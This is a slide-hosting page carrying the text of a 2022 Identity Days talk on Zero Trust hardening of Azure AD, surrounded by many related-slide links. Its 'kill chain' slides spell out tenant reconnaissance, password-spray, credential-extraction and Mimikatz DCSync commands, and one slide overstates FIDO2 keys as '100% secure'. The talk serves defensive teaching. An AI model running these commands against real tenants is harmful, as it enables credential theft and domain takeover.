Fundamentals of Microsoft 365 Security , Identity and Compliance
Fundamentals of Microsoft 365 Security , Identity and ComplianceFundamentals of Microsoft 365 Security , Identity and Compliance
Fundamentals of Microsoft 365 Security , Identity and Compliance
 
Microsoft Azure News - Oct 2022
Microsoft Azure News - Oct 2022Microsoft Azure News - Oct 2022
Microsoft Azure News - Oct 2022
 
Azure Active Directory - An Introduction for Developers
Azure Active Directory - An Introduction for DevelopersAzure Active Directory - An Introduction for Developers
Azure Active Directory - An Introduction for Developers
 
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptxConfidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptx
 
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ..."Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
 
Information Barriers in MS Teams
Information Barriers in MS TeamsInformation Barriers in MS Teams
Information Barriers in MS Teams
 
Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022
 
Azure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish KalamatiAzure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish Kalamati
 
Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022
 
Introduction to basic governance in Azure - #GABDK
Introduction to basic governance in Azure - #GABDKIntroduction to basic governance in Azure - #GABDK
Introduction to basic governance in Azure - #GABDK
 

More from Identity Days

Live Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromisLive Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromis
Identity Days
 
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Identity Days
 
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Identity Days
 
Passwordless – de la théorie à la pratique
Passwordless – de la théorie à la pratiquePasswordless – de la théorie à la pratique
Passwordless – de la théorie à la pratique
Identity Days
 
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
Identity Days
 
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Identity Days
 
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
Identity Days
 
Gérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant IntuneGérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant Intune
Identity Days
 
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Identity Days
 
Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...
Identity Days
 
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Identity Days
 
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure ADDémos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Identity Days
 
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Identity Days
 
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NGSSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
Identity Days
 
Gestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptxGestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptx
Identity Days
 
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
Identity Days
 
Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...
Identity Days
 
Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?
Identity Days
 
Nouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active DirectoryNouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active Directory
Identity Days
 
L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger ! L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger !
Identity Days
 

More from Identity Days (20)

Live Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromisLive Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromis
 
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
 
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
 
Passwordless – de la théorie à la pratique
Passwordless – de la théorie à la pratiquePasswordless – de la théorie à la pratique
Passwordless – de la théorie à la pratique
 
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
 
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
 
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
 
Gérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant IntuneGérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant Intune
 
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
 
Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...
 
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
 
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure ADDémos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
 
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
 
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NGSSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
 
Gestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptxGestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptx
 
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
 
Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...
 
Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?
 
Nouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active DirectoryNouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active Directory
 
L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger ! L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger !
 

Recently uploaded

HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
Zilliz
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Safe Software
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
Jason Packer
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
ssuserfac0301
 
CAKE: Sharing Slices of Confidential Data on Blockchain
CAKE: Sharing Slices of Confidential Data on BlockchainCAKE: Sharing Slices of Confidential Data on Blockchain
CAKE: Sharing Slices of Confidential Data on Blockchain
Claudio Di Ciccio
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
Techgropse Pvt.Ltd.
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
Ivanti
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
Zilliz
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
kumardaparthi1024
 

Recently uploaded (20)

HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
 
CAKE: Sharing Slices of Confidential Data on Blockchain
CAKE: Sharing Slices of Confidential Data on BlockchainCAKE: Sharing Slices of Confidential Data on Blockchain
CAKE: Sharing Slices of Confidential Data on Blockchain
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 

Appliquez le modèle Zero Trust pour le Hardening de votre Azure AD !

  • 1. Merci à tous nos partenaires ! 27 octobre 2022 - PARIS @IdentityDays #identitydays2022
  • 2. Jean-François Apréa CEO and Founder AZ IT Consulting | IT & Cloud Architect | Microsoft Azure Specialist MVP Security | MVP Cloud and Datacenter Management (16) Author | Speaker | Trainer (MCT Alumni) Seyfallah Tagrerout CEO and Founder STC Consulting | Cloud and Security Architect Microsoft Azure Specialist | Microsoft Zero Trust Specialist MVP Azure and Enterprise Mobility (8) Author | Speaker | Trainer Apply the Zero Trust model for Hardening your Azure AD 27 octobre 2022 - PARIS
  • 3. Identity Days 2022 27 octobre 2022 - PARIS Zero Trust? It’s urgent to go, because it’s urgent to be really protected! • Azure AD & Microsoft Entra • Zero Trust and Microsoft vision • Azure AD is Identity and Access Control centric • Azure AD Kill Chain • Azure AD Hardening with Zero Trust in mind 😊 • Good practices and 12-step action plan Agenda
  • 4. Identity Days 2022 27 octobre 2022 - PARIS It becomes difficult to be up-to-date … Hackers don’t give a shit! Source : Jean-Charles Duret-Ferrari  About your project’s scope…  It’s managed buy a third party…  It’s a legacy system…  It’s too critical to patch…  You’ve always done in that way…  About your Go-Live date…  It’s only a Pilot/POC not production…  About NDA…  It was not a mandatory requirements…  It is a non-exposed internal system…  It is hard to change…  It is handled in the Cloud…  The vendor does not support this…  It is an interim solution…  It is encrypted on disk…  You cannot explain the Risk to the Business…  You have other priorities…  You don’t have a Business justification…  You cannot have ROI…  You contracted out that risk… Really, too many bad reasons!
  • 5. Azure AD & Microsoft Entra Identity Days 2022 27 octobre 2022 - PARIS
  • 6. Identity Days 2022 27 octobre 2022 - PARIS Azure Active Directory & Microsoft Entra Azure Active Directory  Identity & Access Management  Inter-connected ecosystem  Security  Hybrid Cloud  Several types of Identities Microsoft Entra • Azure Active Directory • Microsoft Entra Permissions Management • Microsoft Entra Verified ID • Microsoft Entra Workload Identities • Microsoft Entra Identity Governance
  • 8. About Zero Trust and Microsoft vision Identity Days 2022 27 octobre 2022 - PARIS
  • 9. Identity Days 2022 27 octobre 2022 - PARIS Verify explicitly Use least privileged access Assume breach Microsoft Zero Trust vision
  • 10. Identity Days 2022 27 octobre 2022 - PARIS Microsoft Zero Trust vision Assume breach Assume attackers can and will successfully attack anything (identity, network, device, app, infrastructure, etc.) and plan accordingly Transforms overall thinking, strategy, and architectures from “safe network” to “open network” Asset/Node = user, app, device, data, API, etc. Verify explicitly Protect assets against attacker control by explicitly validating that all trust and security decisions use all relevant available information and telemetry Reduces “attack surface” of each asset Use least privilege access Limit access of a potentially compromised asset, typically with just-in-time and just-enough-access (JIT/JEA) and risk- based polices like adaptive access control Reduce blast of compromises
  • 11. Azure AD is Identity and Access Control centric Identity Days 2022 27 octobre 2022 - PARIS
  • 12. Identity Days 2022 27 octobre 2022 - PARIS Azure AD Access Control plane Verification of each access attempt Access control to Apps and Data Azure AD signals Never trust, always verify…
  • 13. Identity Days 2022 27 octobre 2022 - PARIS Azure AD Access Control
  • 14. Azure AD Kill Chain ✨😯 Identity Days 2022 27 octobre 2022 - PARIS
  • 15. Identity Days 2022 Azure AD Kill Chain How to get started 😊 27 octobre 2022 - PARIS
  • 16. Identity Days 2022 Azure AD Kill Chain Step by step progression 😯 27 octobre 2022 - PARIS 1. Azure AD non-authenticated discovery 2. Search a valid Email account 3. Password Spraying attack 4. Change to User Authenticated session 5. Accounts: List synchronized and cloud accounts 6. Azure AD Connect: Find Sync_Sync01_guid@domain.onmicrosoft.com and AAD Connect VM name in MSOL account 7. Now, by default, all is possible! 8. If you become a local Administrator on AAD Connect, you can extract an encrypted version of MSOL account passwords via the AAD Connect SQL database or directly from LSASS.exe using the MIMICATZ tool! 9. By now, possible to carry out a DCSync attack to replicate all the password hashes of the AD domain! 😯 10. And finally, via Active Directory, exploit the AAD SSO features by recovering the PASSWORD of AZUREADSSOACC$ Otherwise, at this point, it is possible to access the Azure portal, without providing a password So, the Azure AD Connect VM must be super secure
  • 17. Identity Days 2022 Azure AD Kill Chain Tenant discovery 😯 27 octobre 2022 - PARIS https://login.microsoftonline.com/ getuserrealm.srf?login=[USERNAM E@DOMAIN]&xml=1 😯 1st info available anonymously without authentication😯 😯 1st info available anonymously without authentication😯 About your tenant:  Active or not?  Name?  Federated or not?
  • 18. Identity Days 2022 Azure AD Kill Chain Tenant discovery 😯 27 octobre 2022 - PARIS Discovery and Reco Azure Tenant Free PowerShell modules to install: GitHub - Gerenios/AADInternals: AADInternals PowerShell module for administering Azure AD and Office 365 Get tenant name, branding and DNS name Get-AADIntLoginInformation -UserName xxxx.domain.onmicrosoft.com Get tenant ID Get-AADIntTenantID -Domain testtenant.onmicrosoft.com Get all additional domains added Get-AADIntTenantDomains -Domain testtenant.onmicrosoft.com Get tenant general infos Invoke-AADIntReconAsOutsider -DomainName testtenant.onmicrosoft.com 😯 Third-Party PowerShell modules to find more... 😯 😯 Third-Party PowerShell modules to find more... 😯
  • 19. Identity Days 2022 Azure AD Kill Chain Initial access + Password Spray / Brut Force 😯 MSOL Spray tool https://github.com/dafthack/MSOLSpray Import-Module MSOLSpray.ps1 Invoke-MSOLSpray -UserList .userlist.txt -Password IdentityDays$Paris%2022 Basic sample passwords files are available here: https://github.com/ohmybahgosh/RockYou2021.txt 27 octobre 2022 - PARIS
  • 20. Identity Days 2022 Azure AD Kill Chain MFA Attack + MFA Fatigue😯 27 octobre 2022 - PARIS Phishing & Man in the middle https://veruscorp.com/mfa- fatigue-leads-to-breach-of- ubers-corporate-systems/ 27/09/2022 MFA Fatigue leads to breach UBER’S Corporate users https://github.com/kgretzky/evilginx Using FIDO2 hardware keys like YubiKey provides 100% secure MFA
  • 21. Identity Days 2022 Azure AD Kill Chain Enumeration😯 27 octobre 2022 - PARIS AzureAD PowerShell Module PowerShell Gallery | AzureAD 2.0.2.140 Install-module –Name AzureAD With standard user but without special privileges! Connect-AzureAD Session state and details Get-AzureADCurrentSessionInfo Tenant details Get-AzureADTenantDetail List all AAD users Get-AzureADUser -All $true Get specific user properties Get-AzureADUser -ObjectId test@tenanttest.onmicrosoft.com Get username with “Admin’’ string” Get-AzureADUser -SearchString "admin" Get all groups with Admin string Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} Get all synchronized groups from AD to AAD Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null} Get all Azure AD groups Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null} Get all users with Global Administrator role Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember Get all Intune managed devices Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"} Get all registered Apps Get-AzureADApplication -All $true Other useful tools:  Via Azure portal  Via PowerShell  Via Azure CLI  Access the list of all users, groups, applications, devices, roles, subscriptions  Send invitations to Guest type accounts  Create security groups  Read group members  Create a new app  Add up to 50 Azure AD devices Warning: By default, an AAD user can 😯
  • 22. Identity Days 2022 Azure AD Kill Chain And finally, use of MSOL_* credentials😯 Enumeration via AD PowerShell module Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl Enumeration via Azure AD PowerShell module Get-AzureADUser -All $true | ?{$_.userPrincipalName - match "Sync_"} Once the AAD Connect has been analyzed, the credentials are extracted Get-AADIntSyncCredentials 27 octobre 2022 - PARIS The end: MSOL_*account credential + DCSync attack with MIMIKATZ runas /netonly /user:amslab.corpMSOL_782bef6aa0a9 cmd Invoke-Mimikatz -Command "lsadump::dcsync /user:amsLabkrbtgt /domain:amsLab.corp /dc:DC01.amsLab.corp"
  • 23. Azure AD Hardening ✨👍 Identity Days 2022 27 octobre 2022 - PARIS
  • 24. Identity Days 2022 27 octobre 2022 - PARIS Azure AD Hardening Inspired by Microsoft Entra Based on customer Experience  Security projects  Assessment / audit missions  Emergency operations  Remediation
  • 25. Identity Days 2022 27 octobre 2022 - PARIS Azure AD Hardening Always start with Azure AD Quick Wins 👍 Based on customer Experience  Security projects  Assessment / audit missions  Emergency operations  Remediation
  • 26. Identity Days 2022 Azure AD Hardening Always start with Azure AD Quick Wins 👍
  • 27. Identity Days 2022 Azure AD Hardening Part1: Enforce your Secrets 27 octobre 2022 - PARIS
  • 28. Identity Days 2022 Azure AD Hardening Part1: Enforce your Secrets 1. Use Microsoft Secured Score  Deploy MFA for EVERYONE  Enable Identity Protection (P2) 2. Use Azure AD Smart Lockout  For Azure AD cloud accounts  For hybrid accounts 3. Deploy Passwordless authentication  FIDO2 Key  Microsoft Authenticator 4. Create TWO recovery accounts  Only in Azure AD  Do not enable synchronization  Do not use MFA  Do not use FIDO2 keys  Disable password expiration  Activate a strong audit on these two accounts with:  Azure Log Analytics  Azure Sentinel  Cloud App Security (MCAS) 27 octobre 2022 - PARIS
  • 29. Identity Days 2022 Azure AD Hardening Part1: Hardening Azure MFA 1. MFA Protection 2. Auth Strengths 3. MFA Fraud alert 4. Identity Protection 27 octobre 2022 - PARIS
  • 30. Identity Days 2022 Azure AD Hardening Part2: Conditional Access Design Scope audience  Regular users  High Privilege Users  Guest / External Users  Workload identities Logical separation in AAD:  Flexibility  Granularity  Lower risk of error  More “readability”  Troubleshooting  Governance 27 octobre 2022 - PARIS
  • 31. Identity Days 2022 Azure AD Hardening Part2: Conditional Access Design Best Practices  Always test behavior  What if?  Report-only mode Area Description Authentication Policies - Enforce MFA for All administrators - Enforce MFA for all standard user - Enforce MFA for all Guest users - Block Legacy authentication - Reduce attack surface Device Access Policies - Block unsupported device platform - Require managed devices (endpoint Manager) – Admin station - Require approved app for mobile access (MAM) - Require managed devices - Specific conditional access for Mac Os (if needed) Strict Security Policies - Block MFA registration from untrusted location - Require Term of use for: All Administrator / Guest Access / Consultants - Control Sign-in Frequency - Disable persistent browser - Block foreign locations - Require trusted location for all admins - User Risk-based and Sign-in Risk based (via Identity Protection) - Authentication context  PIM / MIP labeled SharePoint site / Cloud app security upload and download - Privileged access via filters for Devices - Conditional Access for workload identities - Block all cloud app except ( Teams / SPO) for Guest Access 27 octobre 2022 - PARIS
